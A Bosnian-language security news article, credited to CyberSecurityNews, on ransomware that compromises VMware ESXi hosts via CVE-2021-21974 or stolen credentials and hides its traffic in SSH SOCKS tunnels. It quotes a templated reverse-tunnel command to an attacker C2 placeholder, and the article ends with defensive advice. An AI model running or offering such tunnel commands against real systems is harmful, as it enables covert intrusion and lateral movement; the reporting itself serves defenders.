Novi sojevi ransomware-a tiho se infiltriraju na VMware ESXi hostove postavljanjem SSH tunela i prikrivanjem malicioznog prometa unutar legitimne aktivnosti.
Ova prikrivena taktika omogućava napadačima da pristupe kritičnim okruženjima virtuelnih mašina bez pokretanja mnogih standardnih alarma ili sistema detekcije koji nadgledaju konvencionalnije mrežne puteve.
Budući da ESXi uređaji često ostaju nenadzirani, sajber kriminalci su iskoristili priliku da se sakriju na vidjelo, eksfiltriraju podatke i zaključaju virtuelne mašine uz minimalne smetnje.
Virtuelizirane infrastrukture su atraktivne mete za hakere ransomware-a zbog visoke vrijednosti virtualnih mašina i brze štete koju napadači mogu nanijeti ako preuzmu kontrolu.
Umjesto da naruše svaki sistem za goste pojedinačno, kriminalci se mogu fokusirati na sam ESXi host, omogućavajući im da šifruju sve virtuelne diskove u jednom koordinisanom napadu, rekao je Sygnia.
Jednom kada virtuelne mašine postanu nedostupne, organizacije se utrkuju da obnove kritične funkcije ili razmišljaju o zahtevima za plaćanje. Kontinuitet poslovanja, reputacija i prihodi su u značajnoj opasnosti u ovim incidentima.
Osim enkripcije, napadači također koriste ESXi servere kao centralne tačke kako bi dobili širi pristup unutar korporativnih mreža. Koristeći SSH za kreiranje SOCKS tunela , hakeri se mogu kretati bočno i spojiti promet s rutinskim administrativnim operacijama.
Kompromitovani sistem koji se retko ponovo pokreće i često se nedovoljno evidentira, postaje idealno okruženje za instaliranje upornih backdoor-a.
Kako funkcioniše napad
- Početni pristup :
Napadači dobijaju pristup VMware ESXi hostovima iskorištavanjem ranjivosti (npr. CVE-2021-21974 ) ili upotrebom ukradenih administrativnih akreditiva. Ove metode im omogućavaju da zaobiđu autentifikaciju i uspostave kontrolu nad uređajem. - Uspostavljanje SSH tunela :
Jednom unutra, napadači koriste izvornu SSH funkcionalnost ESXi uređaja da kreiraju SOCKS tunel. Ovo se obično postiže naredbom kao što je:text.ssh –fN -R 127.0.0.1:<SOCKS port> <user>@<C2 IP address>
Ovo podešavanje udaljenog prosljeđivanja portova povezuje narušeni ESXi host sa serverom za komandu i kontrolu (C2) napadača, omogućavajući im da usmjere maliciozni promet kroz host dok se miješaju u legitimnu mrežnu aktivnost. - Postojanost :
ESXi uređaji se rijetko ponovo pokreću, što ih čini idealnim za održavanje polu-trajnih backdoor-a unutar mreže. SSH tunel ostaje aktivan, omogućavajući napadačima da nastave svoje operacije neotkriveni. - Izviđanje i bočno kretanje :
Koristeći uspostavljeni tunel, napadači vrše izviđanje unutar ugrožene mreže, identifikujući dodatne mete i osjetljive podatke. - Šifriranje i implementacija otkupnine :
Nakon prikupljanja obavještajnih podataka, napadači postavljaju ransomware korisne podatke kako bi šifrovali kritične datoteke virtuelne mašine, kao što su.vmdk
(datoteke virtuelnog diska) i.vmem
(datoteke stranica). Ovo čini čitava virtuelizovana okruženja nepristupačnima. Zatim se postavlja zahtjev za otkupninom, često praćen prijetnjama eksfiltracijom podataka ili javnim otkrivanjem.
Arhitektura evidentiranja ESXi servera komplikuje forenzičke istrage. Za razliku od centralizovanih syslog sistema, ESXi distribuira evidencije u više datoteka, kao što su /var/log/shell.log
(aktivnost ljuske) i /var/log/auth.log
(događaji provjere autentičnosti).
Ova fragmentacija zahtijeva od istražitelja da spoje dokaze iz različitih izvora. Štaviše, korištenje SSH tuneliranja maskira malicioznu aktivnost kao normalan administrativni promet.
Budući da mnoge organizacije ne prate aktivno svoja ESXi okruženja, ovi napadi mogu trajati neotkriveni duži period.
Istraživači preporučuju ograničavanje administrativnih privilegija i osiguravanje da je SSH onemogućen prema zadanim postavkama na ESXi hostovima, aktivirajući ga samo kada je to apsolutno neophodno.
Izvor: CyberSecurityNews